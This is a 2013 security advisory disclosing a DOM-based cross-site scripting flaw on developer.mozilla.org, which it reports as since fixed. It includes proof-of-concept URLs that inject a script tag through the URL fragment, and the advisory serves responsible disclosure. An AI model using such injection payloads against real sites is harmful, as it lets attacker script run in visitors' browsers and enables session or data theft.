SSCHADV2013-010 - developer.mozilla.org DOM based Cross-site Scripting vulnerability
Advisory: developer.mozilla.org - DOM based Cross-site Scripting vulnerability
Advisory ID: SSCHADV2013-010
Author: Stefan Schurtz
Affected Software: Successfully tested on developer.mozilla.org
Vendor URL:
Vendor Status: fixed
==========================
Vulnerability Description
==========================
The website 'developer.mozilla.org' is prone to a DOM based XSS vulnerability.
==========================
PoC-Exploit
==========================
// Chrome 27.0 & Internet Explorer 10
https://developer.mozilla.org/en-US/docs/Code_Review_FAQ#'/><script>alert(8);</script>
https://developer.mozilla.org/en-US/docs/Code_Review_FAQ#'/><script>alert(document.domain);</script>
==========================
Disclosure Timeline
==========================
28-May-2013 - developer informed on bugzilla.mozilla.org
12-Jun-2013 - fixed by developer
==========================
Credits
==========================
Vulnerability found and advisory written by Stefan Schurtz.
==========================
References
==========================
http://www.mozilla.org
http://www.darksecurity.de/advisories/2013/SSCHADV2013-010.txt